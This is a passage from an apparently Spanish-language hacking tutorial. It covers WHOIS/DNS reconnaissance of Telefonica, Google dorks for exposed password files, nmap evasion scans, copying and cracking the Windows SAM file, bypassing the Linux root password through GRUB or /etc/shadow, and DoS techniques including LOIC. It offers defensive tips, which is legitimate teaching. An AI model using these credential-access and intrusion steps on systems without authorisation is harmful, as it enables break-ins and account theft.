21 Si analizamos el correo completo : Obtener informacion de los DNS En Internet existen sitios donde se realiza el registro de nombres de dominio, o sea donde yo registro y otros. El más conocido de estos sitios es InterNIC. La información sobre nombres de dominio puede consultarse de muchas maneras, y es impresionante lo que puede averiguarse. Si bien las consultas pueden hacerse desde la página, en Linux tenemos el comando 'whois' que realiza justamente la función de consultar la base de datos de dominios de InterNIC. Veamos de qué formas podemos utilizarlo. Hagamos una consulta por todos los dominios que posean un determinado string. En nuestro caso probemos buscando Telefonica whois -h whois.crsnic.net "Telefonica" TELEFONICA.VCRINGS.COM TELEFONICA.TUHOGAR.NET TELEFONICA.PTSSA.NET TELEFONICA.MOTOSTIVOLIRENT.NET TELEFONICA.ES TELEFONICA.EAW-WEB.COM TELEFONICA.DNSPERU123.BIZ TELEFONICA.COM.BR TELEFONICA.NET TELEFONICA.COM >>> Last update of whois database: Sat, 19 Nov :01:31 UTC <<< The Registry database contains ONLY.COM,.NET,.EDU domains and Registrars. Ahora que tenemos identificado el dominio que nos interesa podemos obtener información más detallada utilizando nuevamente whois whois telefonica.com

22 Server Name: TELEFONICA.COM.BR Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM Whois Server: whois.publicdomainregistry.com Referral URL: Domain Name: TELEFONICA.COM Registrar: INTERDOMAIN, S.A. Whois Server: whois.interdomain.net Referral URL: Name Server: NS3CHOS01.TELEFONICA-DATA.COM Name Server: NSJC8HOS01.TELEFONICA-DATA.COM Status: clientdeleteprohibited Status: clienttransferprohibited Status: clientupdateprohibited Updated Date: 18-oct-2006 Creation Date: 03-may-1996 Expiration Date: 04-may-2013 >>> Last update of whois database: Sat, 19 Nov :48:24 UTC <<< The Registry database contains ONLY.COM,.NET,.EDU domains and Registrars. Domain Name... telefonica.com Creation Date... 03/05/1996 Expiry Date... 04/05/2013 Last Update Date... 10/05/2011 Organization Contact Id... PROP Organization Name... TELEFONICA, S.A. Organization Org... TELEFONICA, S.A. Organization Street... GRAN VIA, 28 Organization City... MADRID Organization State... MADRID Organization PC Organization Country... ES Organization Phone Organization Fax Organization ... Administrative Contact Id Administrative Name... MANUEL CRESPO DE LA MATA Administrative Org... TELEFONICA S.A. Administrative Street... GRAN VIA 28 Administrative City... MADRID Administrative State... MADRID Administrative PC... E Administrative Country... ES Administrative Phone Administrative Fax Administrative ... Technical Contact Id Technical Name... Ventanilla Unica Technical Org... TELEFONICA S.A. Technical Street... GRAN VIA 28 Technical City... MADRID Technical State... MADRID Technical PC... E Technical Country... ES Technical Phone Technical Fax Technical

23 Domain servers in listed order: Name Server... nsjc8hos01.telefonica-data.com Name Server... ns3chos01.telefonica-data.com Name Server... Name Server... Name Server... Name Server... Veamos ahora que nos arroja la consulta con el comando host: host -d telefonica.com Trying "telefonica.com" ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ;telefonica.com. IN A ;; ANSWER SECTION: telefonica.com IN A Received 48 bytes from #53 in 2 ms Trying "telefonica.com" ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ;telefonica.com. IN AAAA Received 32 bytes from #53 in 2 ms Trying "telefonica.com" ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 13, ADDITIONAL: 12 ;; QUESTION SECTION: ;telefonica.com. IN MX ;; ANSWER SECTION: telefonica.com IN MX 10 smtpus.telefonica.com. telefonica.com IN MX 10 smtpar.telefonica.com. Received 506 bytes from #53 in 308 ms Como vimos, es muy facil conseguir datos importantes y además las direcciones IP de cualquier servicio web. Es importante que tambien en los casos donde host nos devuelve un dominio en vez de una ip, podremos resolverlo utilizando dig dig smtpus.telefonica.com ; <<>> DiG <<>> smtpus.telefonica.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 13, ADDITIONAL: 12 ;; QUESTION SECTION: ;smtpus.telefonica.com. IN A

24 ;; ANSWER SECTION: smtpus.telefonica.com IN A ;; Query time: 330 msec ;; SERVER: #53( ) ;; WHEN: Sat Nov 19 17:11: ;; MSG SIZE rcvd:

25 GOOGLE HACKING Los buscadores son herramientas muy populares que todos usamos y que todos necesitamos y además son muy potentes y absorben toda la información que encuentran en su camino que no esté debidamente protegida. Google es hoy en día el buscador más popular en uso, siendo sus técnicas de recolección de datos y algoritmos de clasificación muy avanzados, lo que proporciona resultados certeros en las búsquedas a poco que sepamos trabajar con sus múltiples funcionalidades. Google es, con toda probabilidad, el buscador más tecnológicamente avanzado que existe. Esto facilita que dispongamos de mucha información en la red. Pero también posibilita que podamos hallar información sensible que no ha sido protegida adecuadamente. Veamos en qué consiste esta técnica de minado de datos con fines maliciosos, utilizando ejemplos y con algunos consejos de como prevenirlos. Qué es el Google Hacking? A esta altura te estarás imaginando que descargas una super aplicación oculta en algún link de Google por la cual serás capaz de obtener acceso a los servidores del mundo. Nada más lejos de la realidad pero tampoco tan equivocado. La realidad es que aplicación que utilizaremos para esta técnica es el mismo buscador de Google. Para que comprendas mejor lo que quiero decirte, abre tu navegador favorito y escribe literalmente (respeta las comillas y los simbolos por favor): "Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log o tal vez podriamos hacer la siguiente búsqueda: "teléfono * * *" "dirección *" " " intitle:"curriculum vitae" ext:pdf Por si no ha quedado claro la técnica conocida como Google Hacking consiste en conocer como funciona el buscador para explotar su potencial a nuestro favor. Si las búsquedas las orientamos a ciertas palabras clave que nos ayuden a encontrar información sensible, puntos de entrada sensibles a posibles ataques, como por ejemplo: "SquirrelMail version 1.4.4" inurl:src ext:php o cualquier otro tipo de información que tuviera carácter de sensibilidad, estaremos ejecutando un Google hack

26 Google Hacking es buscar en Google información sensible, generalmente con fines que seguramente no sea el que estás pensando ;-) Más ejemplos de Google Hacking Productos vulnerables "Powered by MercuryBoard [v1" Mensajes de error "Warning: mysql_query()" "invalid query" Archivos que contienen información sensible "Index of" / "chat/logs" Archivos que contienen claves ext:pwd inurl:(service authors administrators users) "# -FrontPage-" Archivos que contienen nombres de usuario filetype:conf inurl:proftpd.conf -sample Footholds e información de apoyo al acceso +htpasswd +WS_FTP.LOG filetype:log Páginas con formularios de acceso "You have requested access to a restricted area of our website. Please authenticate yourself to continue." Páginas que contienen datos relativos a vulnerabilidades filetype:pdf "Assessment Report" nessus Directorios sensibles filetype:cfg ks intext:rootpw -sample -test -howto Información sensible sobre comercio y banca electrónica inurl:shopdbtest.asp

27 Dispositivos hardware online camera linksys inurl:main.cgi Archivos vulnerables intitle:"directory Listing" "tree view" Servidores vulnerables intitle:"mail Server CMailServer Webmail" "5.2" Detección de servidores web intitle:"welcome to Windows Small Business Server 2003" Cómo impedir ser víctimas de Google Hacks? La mejor forma de no convertirnos en una víctima es aprender cómo funciona Google. Conozca y experimente las posibilidades de la búsqueda avanzada. Entienda que las búsquedas son muy refinables y que es el motor de búsqueda más poderoso que hay hoy en día, que no sólo está pensado para ordenar y encontrar páginas web, sino que también pueden hallarse documentos de OpenOffice, informes, faxes, notas privadas, fotografías, teléfonos, etc. Absolutamente todo lo que sea accesible desde un navegador terminará en las bases de datos de Google para que cualquiera lo encuentre. Una vez que hayamos comprendido lo gigantesco que es Google, comprenderemos que podemos utilizarlo para hallar documentos inocuos, podemos emplearlo para obtener documentos con datos sensibles. Esta no es una técnica tonta y obsoleta. Hay gente que vive utilizandola y comercializando la información que extrae de ellas. Si dispone de su propia página web, asegúrese de comprender lo importante que es tener un archivo de robots.txt correctamente configurado. Tener una página web es algo más que colocar fotos y documentos en la Red para que las vean sus amigos o sus familiares. Nuevamente les recuerdo en que todo lo que se coloca en servidores Web (la nube) es susceptible de ser indexado por los motoroes de las bases de datos de Google. Esto es aplicable para cualquier objeto accesible desde documentos Web: cámaras web, impresoras, etc

28 Consejos finales No deje de consultar los parámetros que definen el mecanismo de posicionamiento de resultados en Google. Aplique "posicionamiento inverso" a todo aquello que quiera mantener lejos de ojos ajenos. Puestos a aparecer, mejor aparecer en el puesto doscientos que en el quinto. No está de más usar el buscador para aprender cómo funciona el Google Hacking y aplicar técnicas de inversión aplicadas a su caso. Además debería replantearse la exclusión de los robots

29 SCANNING & ENUMERATION Nmap (de Network Mapper) es una utilidad de software libre para explorar, administrar y auditar la seguridad de redes de ordenadores. Detecta hosts online, sus puertos abiertos, servicios y aplicaciones corriendo en ellos, su sistema operativo, que firwalls/filtros corren en una red y de que tipo son. Es excelente para hacer trabajos de auditoria y fue diseñado para llevar acabo escaneos rápidos en una gran cantidad de redes, pero es igualmente usable en hosts individuales. Es reconocido como el scanner de puertos mas poderoso. Y se lo usa basicamente para 3 cosas: Auditorias de seguridad. Pruebas rutinarias de redes. Recolector de informacion para futuros ataques Nmap es software libre y por lo tanto gratuito. Y basicamente existe una version para cada sistema operativo que conozcas: MacOSX, Microsoft Windows, GNU/Linux, OpenBSD, Solaris, etc. Funcionamiento de Nmap Es capaz de utilizar diferentes técnicas de evasión de detección como escaneo sealth. Soporta escaneos sobre ciertos puertos específicos, entre rangos IP específicos, uso se paquetes Null, FIN, Xmas y ACK, además SYN que es el paquete por defecto. Esto significa que se mandan cierto tipo de paquetes a cada puerto y estos responderán con alguna señal que permitirá a scanner encontrar versiones y servicios. Conceptos importantes Que es un puerto? Un puerto es una zona en la que dos ordenadores (hosts) intercambian información Que es un servicio? Un servicio es el tipo de información que se intercambia con una utilidad determinada como ssh o telnet. Que es un Firewall? Un firewall acepta o no el trafico entrante o saliente de un ordenador. Que son paquetes SYN? Así por encima, pueden ser paquetes que abren un intento de establecer una conexión TCP. Debemos tener en cuenta que para Nmap un puerto puede estar de tres maneras: open: el puerto es accesible y hay un demonio escuchando. closed: el puerto es accesible pero no hay un demonio escuchando. filtered: el puerto no es accesible, un firewall filtra el puerto

30 Instalacion en Linux En el caso de distribuciones basadas en Debian se instala via apt: sudo apt-get install nmap Si usas otra distro puedes buscarlo en los repositorios de tu distro y 100% seguro que lo encontrarás. Y si usas algún otro sistema operativo entra a esta pagina y lo descargas. Como usar Nmap La forma más básica de usarlo es escribir en una consola algo como: nmap Es decir el comando nmap seguido de una ip o dominio. Este uso tán básico solo nos devuelve que puertos están abiertos tras un scan simple. Dependiendo de la seguridad de la ip que se escanee puede que nos bloquee el escaneo si lo hacemos de esa manera. Una forma mas discreta de hacerlo que no deja registros en el sistema es así: nmap ss Cabe resaltar que existen varios tipos de modificadores de scan lo mas importante es lograr identificar la combinación mas apropiada, los modificadores que se pueden utilizar para realizar el scan son los siguientes: st se intenta hacer un barrido de puertos por TCP la ventaja de esta técnica es que no requiere usuarios privilegiados, opuesto a ss su se intenta hacer un barrido de puertos por UDP, es útil cuando se intentan descubrir puertos de nivel superior que pueden estar detrás de un firewall, lenta pero permite hacer auditorias mas exactas. sa se usan mensajes de ACK para lograr que sistema responda y así dterminar si el puerto esta abierto algunos Firewall no filtran estos Mensajes y por ello puede ser efectivo en algunos casos. sx puede pasar algunos Firewall con malas configuraciones y detectar servicios prestándose dentro de la red sn puede pasar algunos Firewall con malas configuraciones y detectar servicios prestándose dentro de la red sf puede pasar algunos Firewall con malas configuraciones y detectar servicios prestándose dentro de la red sp este modificador ayuda a identificar que sistemas están arriba en la red (en funcionamiento) para luego poder hacer pruebas mas especificas, similar a Ping. sv intenta identificar los servicios por los puertos abiertos en el sistema esto permite evaluar cada servicio de forma individual para intentar ubicar vulnerabilidades en los mismos. so con esta opción se identifica que protocolos de nivel superior a capa tres (Red o Network) responden en el sistema, de esta manera es mas fácil saber las características de la red o el sistema que se intenta evaluar

31 Adicionalmente a las opciones de scan se pueden especificar opciones que permiten explotar mas aun la herramienta, dentro de las opciones que mas frecuentemente se usan están las de evitar el Ping o mostrar todos los resultados en pantalla al máximo detalle, veamos cuales son estas opciones: b Para determinar si la victima es vulnerable al bounce attack n no hace conversiones DNS para hacer el -sp mas rapido vv hacer la salida de la herramienta detallada en pantalla f habilita la fracmentacion de esta forma es mucho mas complejo para un un firewall u otro tipo de sistema lograr hacer el rastreo. on redirige la salida a un archivo ox redirige la salida a un archivo XML --stylesheet con esta opción se usa una hoja de estilo que hace mas fácil la lectura de la salida en XML P0 indica que no se debe hacer ping a los sistemas objetivo antes de iniciar el análisis útil para evitar el bloque en algunos Firewall p se usa para especificar puertos de análisis o rango de puertos. T se usa para especificar la velocidad general del scan de esta forma se puede pasar inadvertido en algunos sistemas que detectan la velocidad de los paquetes entrantes. Veamos algunos ejemplos: nmap sv P0 O vv o archivo.txt El anterior comando ejecuta un barrido (scan) de puertos sobre la IP seleccionada, evita que se ejecute Ping sobre la maquina, además de esto intenta detectar el sistema operativo, para cada puerto según las cabeceras que se retornan se detecten los servicios ejecutándose y la información se dejara en el archivo.txt nmap /24 El anterior comando escanea una red completa nmap p El anterior comando escanea un rango de puertos Veamos un ejemplo completo y real: sudo nmap -ss Starting Nmap 5.00 ( ) at :34 ART NSE: Loaded 0 scripts for scanning. Initiating Ping Scan at 17:34 Scanning [4 ports] Completed Ping Scan at 17:34, 0.41s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 17:34 Completed Parallel DNS resolution of 1 host. at 17:34, 0.00s elapsed Initiating SYN Stealth Scan at 17:34 Scanning geminis2.dotlinux.com.ar ( ) [1000 ports] Discovered open port 21/tcp on Discovered open port 53/tcp on

32 Discovered open port 22/tcp on Discovered open port 80/tcp on Completed SYN Stealth Scan at 17:35, 28.99s elapsed (1000 total ports) Host geminis2.dotlinux.com.ar ( ) is up (0.24s latency). Interesting ports on geminis2.dotlinux.com.ar ( ): Not shown: 994 filtered ports PORT STATE SERVICE 20/tcp closed ftp-data 21/tcp open ftp 22/tcp open ssh 53/tcp open domain 80/tcp open http 667/tcp closed unknown Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in seconds Raw packets sent: 3008 ( KB) Rcvd: 22 (908B) Otra opción muy interesante es instalar zenmap que nos permitirá utilizar nmap en modo grafico facilitando aún más su uso

33 SYSTEM HACKING La idea central del Hackeo de sistemas es el romper o adivinar passwords o claves para poder tener acceso a los sistemas, cuentas de , información confidencial, etc. Una vez se tiene acceso al sistema comprometido lo próximo es escalar privilegios, ejecutar aplicaciones, esconder archivos y cubrir las huellas para no poder ser detectado. Windows System Hacking Los passwords o claves pueden ser rotos o adivinados de manera manual (dificil) o con herramientas automatizadas (facil) como ataques de diccionario y de fuerza bruta. Para romper passwords manualmente sigua estos pasos: 1. Encuentre una cuenta valida de usuario, como Administrador o Guest. 2. Cree una lista de posibles passwords. 3. Ordene la lista de alta a baja probabilidad. 4. Pruebe cada password. 5. Inténtelo hasta que el password sea encontrado. Hacerlo de manera manual no es muy efectivo y consume bastante tiempo. Pero es bueno practicarlo porque no siempre vamos a tener a la mano herramientas automatizadas que hagan el trabajo por nosotros. Los SO Windows y Linux tienen un archivo donde guardan los passwords (en forma de hash) para propósitos de logon o login al sistema, así que la manera más efectiva de romper un password para tener acceso a un sistema es teniendo acceso a este archivo. En Windows los passwords son guardados en el archivo llamado SAM (Security Accounts Manager) pero este archivo está asegurado (locked) cuando el SO está funcionando, por lo tanto es imposible copiar o mover el archivo. Más adelante le decimos como copiar el archivo SAM en Windows. En Linux los passwords son guardados en el archivo llamado password shadow file. Qué es el NT LanManager Hash? Los SO Windows 2000, XP y 2003 Los SO Windows 2000, XP y 2003 utilizan el algoritmo NT Lan Manager (NTLM) para asegurar, cifrar y guardar los passwords de usuario, incluso las más recientes versiones de Windows, como vista y 7 utilizan NTLM por razones de compatibilidad pero este debe ser activado manualmente para cuentas locales a través de la configuración de lapóliza de seguridad (Security Policy)y para Active Directory se activa aplicando la misma configuración a los controladores de dominio (domain controller). Se considera como una buena práctica de seguridadinhabilitar el NTLM si este no se necesita, porque el NTLM es considerado débil y obsoleto. Las nuevas versiones de Windows (Vista / 7 / Server 2008) utilizan NTLMv2 o el protocolo Kerberos

34 El NTLM es considerado débil porque dependiendo del password el hash puede ser bien fácil de romper. Ejemplo: Supongamos que su clave o password para acceder a su sistema Windows es123abc una vez presionado el botón Enter la clave se convierte a letras Mayúsculas: 123ABC como la clave es menor de14 caracteres a esta se le añaden 0 (ceros) para completar 14 caracteres: 123ABC Antes de que el password sea cifrado, los 14 caracteres son divididos por la mitad: 123ABC0 y Entonces cada pedazo es cifrado individualmente y el resultado de cada uno es unido o concatenado: 123ABC0 = 7BB597FA94CD5C1D = AAD3B435B51404EE Entonces el hash sería = 7BB597FA94CD5C1DAAD3B435B51404EE Si la clave es de 7 caracteres o menos el resultado de la segunda mitad del hash siempre será AAD3B435B51404EE. Rompiendo passwords en Windows 2000 y XP 1. Inicie la máquina con un SO alterno como DOS o Linux con un boot CD. 2. Copie el archivo SAM desde el directorio repair (C:\windows\repair\) 3. Como el archivo SAM se comprime cuando se crea en el directorio repair debe descomprimirlo o expandirlo utilizando el comando del Command Prompt, C:\>expand sam sam.txt (el archivo sam.txt es el archivo destino donde se descomprimirá el archivo SAM) 4. Después que el archivo es descomprimido se le puede realizar un ataque de diccionario, hibrido o de fuerza bruta utilizando una herramienta automatizada como L0phtCrack. Los 4 tipos de ataques a passwords Passive Online (pasivo en línea) Este tipo de ataque también es conocido como sniffing the password. Se realiza tanto en redes cableadas (wire) como inalámbricas (wireless). Los ataques pasivos no pueden ser detectados por el usuario final. El atacante obtiene el password durante el proceso de autenticación o login. Si el password obtenido esta en forma de hash o cifrado, entonces el hacker usara alguna herramienta de su arsenal para romperlo. Active Online (activo en línea) Este tipo de ataque se refiere a tratar de adivinar la clave. Este ataque solo es efectivo si el password de Administrador es simple o débil

35 Offline (fuera de línea) Los ataques offline son realizados desde una ubicación que no es la de la computadora que se intenta acceder. Por ejemplo: Usted logra copiar el archivo SAM de una computadora de una biblioteca pública en una memoria portátil. Luego usted se va a su casa e intenta romper el password en su computadora. Existen 3 tipos de ataques Offline: Dictionary attack: es un ataque mediante el uso de listas de palabras encontradas en los diccionarios. Un ejemplo seria: Administrador Hybrid attack: este ataque sustituye letras por números y añade números al final. Un ejemplo seria: Adm1n1strador o Administrador35 Brute-force attack: este tipo de ataques intenta todas las combinaciones de letras, números y caracteres especiales. Un ejemplo seria: Nonelectronic attack: se refiere a los ataques que no requieren conocimientos técnicos para romper una clave. Algunos ejemplos son: ataques como ingeniería social shoulder surfing (mirar por encima del hombro de otra persona para ver la clave que escribe) dumpster diving (rebuscar en la basura) Herramientas para romper Passwords: 1. Legion: Programa automatizado para adivinar passwords en sesiones del NetBIOS. Legion tambien escanea multiples rangos de direcciones IP y tiene una herramienta para ataques de diccionarios. 2. KerbCrack: Consiste de 2 programas: elkerbsniffy y elkerbcrack. El primero es un sniffer que literalmente escucha en la red y captura los logins del protocolo Kerberos en Windows 2000/XP. El segundo, el cracker es usado para encontrar passwords del archivo capturado usando un ataque de fuerza bruta (brute force) o de diccionario. 3. Win32CreateLocalAdminUser: Programa usado para crear un nuevo usuario con el nombre de usuario y password X. Añade al usuario X al grupo local del Administrador. 4. C2MYAZZ: Es un programa espía (spyware) que hace que los sistemas Windows (cliente) envien los passwords en texto plano. 5. SMBDie: Este pequeño programa hace que los sistemas Windows NT/2000/XP colapsen enviando pedidos (request) especialmente manipulados al SMB (Server Message Block). 6. SMBrelay: Es un servidor SMB que captura hashes de nombres de usuarios y

36 passwords del tráfico recibido por el SMB. 7. SMBrelay2: Es parecido al SMBrelay pero en vez de usar direcciones IP para capturar nombres de usuario y passwords utiliza nombres del NetBIOS. 8. L0phtCrack: Este programa captura paquetes del Server Message Block (SMB) en segmentos de una red local y captura sesiones individuales de login. Tambien posee herramientas para ataques de diccionario, fuerza-bruta e hibridos. 9. Samdump: Programa para ver el contenido de los archivos SAM. Abra el Command Prompt y entre samdump sam. Recuerde que debe ejecutar el programa y tener el archivo SAM en el mismo directorio donde se está ejecutando el Command Prompt. Contramedidas Nunca deje el password por defecto Nunca utilice passwords que se puedan encontrar en un diccionario Nunca utilice passwords relacionados a sus pasatiempo, nombre de mascotas, nombres de miembros de su familia, fechas de nacimiento, etc., etc Nunca utilice passwords relacionados a los nombre de host y dominios Se recomienda por los profesionales de seguridad informática que los passwords se cambien cada 30 días. Nunca reutilice los últimos 3 passwords. Monitoree los logs del Event Viewer (Windows) o el Auth (en linux). Los Administradores necesitan monitorear estos registros para reconocer intentos de intrusión al sistema. Como localizar el Event Viewer en Windows XP Start > Control Panel > Administrative Tools > Event Viewer (en la ventana izq. seleccione el log Security) Como localizar el Event Viewer en Windows Vista Start > Event Viewer (en la ventana izq. seleccione Windows logs y dentro elija el log Security)

37 Linux System Hacking Tal vez por culpa del Alzheimer o simplemente porque nos encontramos un servidor sin dueño, tenemos que reiniciar la clave del usuario root para poder acceder al mismo. Si bien existen distintos metodos para lograr el mismo resultado, unicamente voy a describir los dos más utilizados. Procedimiento 1: GRUB sin Password Este procedimiento es el más rápido de todos pero solo puede ser utilizado cuando GRUB o GRUB2 no poseen una password de acceso. 1. Encendemos el equipo con Linux 2. En la pantalla de inicio de Grub tipeamos la letra 'e' para editar las opciones de arranque. 3. Ahora, al final de la linea que comienza con el string linux, debemos agregar el string init=/bin/bash de manera que quede algo similar a esto: linux /boot/vmlinuz-version root=uuid=hex ro quite init=/bin/bash 4. El último paso que debemos realizar es apretar las teclas CTRL+X para iniciar el proceso de arranque. Cuando el sistema operativo termine de iniciarse en este modo recovery tenemos que escribir los siguientes comandos: # mount -o remount,rw # passwd (debemos escribir la nueva password de root dos veces) # sync reboot Despues de reiniciar el sistema ya tendremos acceso al usuario root del sistema. Procedimiento 2: GRUB con Password Este es el metodo que tendremos que realizar si nos encontramos con un gestor de arranque GRUB o GRUB2 protegido por una password. 1. Encendemos el equipo y nos aseguraremos de iniciarlo con cualquier LiveCD que tengamos a la mano. 2. Cuando tengamos disponible una consola del LiveCD identificaremos el disco local del equipo en el que está instalado el linux al que no tenemos acceso. 3. Ahora debemos crear un directorio para montar este disco utilizando el comando mount con una linea muy similar a esta: mount /dev/sdax /tmp/testdir 4. Una vez montado el disco, ingresamos al directorio en donde montamos el disco de nuestro linux y ahi buscaremos el archivo shadow que estará en el directorio /tmp/testdir/etc/

38 5. Lo unico que debemos hacer, es editar el archivo shadow eliminando la password del usuario root. Para esto utilizaremos el editor vi o el que tengamos disponible. 6. Por ejemplo en este caso root:dsfdsdf!s:12581:0:99999:7::: la password es dsfdsdf!s asi que procederemos a eliminarla dejandola en blanco para que quede como el siguiente ejemplo: root::12581:0:99999:7::: 7. Una vez editado el archivo shadow lo grabamos, desmontamos el disco y reiniciamos el equipo. Estos procedimientos son realmente muy sencillos, pero eso no significa que los sistemas Windows sean más seguros que los sistemas Linux

39 DENEGACION DE SERVICIO Un ataque de denegación de servicio, también llamado ataque DoS (de las siglas en inglés Denial of Service), es un ataque a un sistema de computadoras o red que causa que un servicio o recurso sea inaccesible por sus usuarios. Normalmente provoca la pérdida de la conectividad de la red por el consumo del ancho de banda de la red de la víctima o sobrecarga de los recursos del sistema de la víctima. Se genera mediante la saturación de los puertos con flujo de información, haciendo que el servidor se sobrecargue y no pueda seguir prestando servicios, por eso se le denomina "denegación", pues hace que el servidor no dé abasto a la cantidad de solicitudes. Esta técnica es usada para dejar fuera de servicio a los servidores objetivo

40 Una ampliación del ataque Dos es el llamado ataque distribuido de denegación de servicio, también llamado ataque DDoS (de las siglas en inglés Distributed Denial of Service) el cual se lleva a cabo generando un gran flujo de información desde varios puntos de conexión. La forma más común de realizar un DDoS es a través de una botnet, siendo esta técnica el ciberataque más usual y eficaz por su sencillez tecnológica. En ocasiones, esta herramienta ha sido utilizada como un buen método para comprobar la capacidad de tráfico que un equipo puede soportar sin volverse inestable y afectar a los servicios que presta. Un administrador de redes puede así conocer la capacidad real de cada máquina. Métodos de ataque Un ataque de "Denegación de servicio" impide el uso legítimo de los usuarios al usar un servicio de red. El ataque se puede dar de muchas formas. Pero todas tienen algo en común: utilizan el protocolo TCP/IP para conseguir su propósito. Un ataque DoS puede ser perpetrado de varias formas. Aunque básicamente consisten en: Consumo de recursos, tales como ancho de banda, espacio de disco, o tiempo de procesador Alteración de información de configuración, tales como la información de rutas Alteración de información de estado, tales como interrupción de sesiones TCP (TCP reset) Interrupción de componentes físicos de red Obstrucción de medios de comunicación entre usuarios de un servicio y la víctima, de manera que ya no puedan comunicarse adecuadamente. Inundación SYN (SYN Flood) Principios de TCP/IP Cuando una máquina se comunica mediante TCP/IP con otra, envía una serie de datos junto a la petición real. Estos datos forman la cabecera de la solicitud. Dentro de la cabecera se encuentran unas señalizaciones llamadas Flags (banderas). Estas señalizaciones (banderas) permiten iniciar una conexión, cerrarla, indicar que una solicitud es urgente, reiniciar una conexión, etc. Las banderas se incluyen tanto en la solicitud (cliente), como en la respuesta (servidor). Para aclararlo, veamos cómo es un intercambio estándar TCP/IP: 1. Establecer Conexión: El cliente envía una Flag SYN, si el servidor acepta la conexión, éste, debería responderle con un SYN/ACK luego el cliente debería responder con una Flag ACK

41 1-Cliente SYN-----> 2 Servidor 4-Cliente <-----SYN/ACK Servidor 5-Cliente ACK-----> 6 Servidor 2. Resetear Conexión: Al haber algún error o perdida de paquetes de envío se establece envío de Flags RST: 1-Cliente Reset-----> 2-servidor 4-Cliente <----Reset/ACK Servidor 5-Cliente ACK------> 6-Servidor La inundación SYN envía un flujo de paquetes TCP/SYN (varias peticiones con Flags SYN en la cabecera), muchas veces con la dirección de origen falsificada. Cada uno de los paquetes recibidos es tratado por el destino como una petición de conexión, causando que el servidor intente establecer una conexión al responder con un paquete TCP/SYN-ACK y esperando el paquete de respuesta TCP/ACK (Parte del proceso de establecimiento de conexión TCP de 3 vías). Sin embargo, debido a que la dirección de origen es falsa o la dirección IP real no ha solicitado la conexión, nunca llega la respuesta. Estos intentos de conexión consumen recursos en el servidor y copan el número de conexiones que se pueden establecer, reduciendo la disponibilidad del servidor para responder peticiones legítimas de conexión. SYN cookies provee un mecanismo de protección contra Inundación SYN, eliminando la reserva de recursos en el host destino, para una conexión en momento de su gestión inicial. Inundación ICMP (ICMP Flood) Es una técnica DoS que pretende agotar el ancho de banda de la víctima. Consiste en enviar de forma continuada un número elevado de paquetes ICMP Echo request (ping) de tamaño considerable a la víctima, de forma que esta ha de responder con paquetes ICMP Echo reply (pong) lo que supone una sobrecarga tanto en la red como en el sistema de la víctima. Dependiendo de la relación entre capacidad de procesamiento de la víctima y el atacante, el grado de sobrecarga varía, es decir, si un atacante tiene una capacidad mucho mayor, la víctima no puede manejar el tráfico generado. SMURF Existe una variante a ICMP Flood denominado Ataque Smurf que amplifica considerablemente los efectos de un ataque ICMP. Existen tres partes en un Ataque Smurf: El atacante, el intermediario y la víctima (comprobaremos que el intermediario también puede ser víctima). En el ataque Smurf, el atacante dirige paquetes ICMP tipo "echo request" (ping) a una dirección IP de broadcast, usando como dirección IP origen, la dirección de la víctima

42 (Spoofing). Se espera que los equipos conectados respondan a la petición, usando Echo reply, a la máquina origen (víctima). Se dice que el efecto es amplificado, debido a que la cantidad de respuestas obtenidas, corresponde a la cantidad de equipos en la red que puedan responder. Todas estas respuestas son dirigidas a la víctima intentando colapsar sus recursos de red. Como se dijo anteriormente, los intermediarios también sufren los mismos problemas que las propias víctimas. Inundación UDP (UDP Flood) Básicamente este ataque consiste en generar grandes cantidades de paquetes UDP contra la víctima elegida. Debido a la naturaleza sin conexión del protocolo UDP, este tipo de ataques suele venir acompañado de IP spoofing. Es usual dirigir este ataque contra máquinas que ejecutan el servicio Echo, de forma que se generan mensajes Echo de un elevado tamaño

43 Low Orbit Ion Cannon (LOIC) Low Orbit Ion Cannon (abreviado LOIC) es una aplicación diseñada para realizar un ataque de denegación de servicio durante el proyecto Chanology, desarrollada por «praetox» usando el lenguaje de programación C# (Existe también un fork en C++ y Qt llamado LOIQ). La aplicación realiza un ataque de denegación de servicio del objetivo enviando una gran cantidad de paquetes TCP, paquetes UDP o peticiones HTTP con objeto de determinar cuál es la cantidad de peticiones por segundo que puede resolver la red objetivo antes de dejar de funcionar. IRCLOIC El desarrollador «NewEraCracker» actualizó LOIC para su uso en la Operation Payback, arreglando algunos bugs y añadiendo algunas habilidades nuevas al programa.1 Desde la versión , LOIC incorpora la posibilidad de que el usuario delegue voluntariamente el control de la aplicación LOIC al operador de un canal IRC, que puede controlar de esta manera un ataque coordinado empleando todos los clientes conectados a dicho canal. Esta característica se denomina comúnmente como inteligencia de enjambre (Hive Mind, en inglés) y permite la organización rápida de una botnet formada por voluntarios. La versión con control remoto por IRC se denomina habitualmente IRCLOIC.2 Esta actualización funciona en Windows XP y posteriores, necesitando Microsoft.NET Framework 3.5 Service Pack 1. También funciona en sistemas Linux con los paquetes Mono o Wine

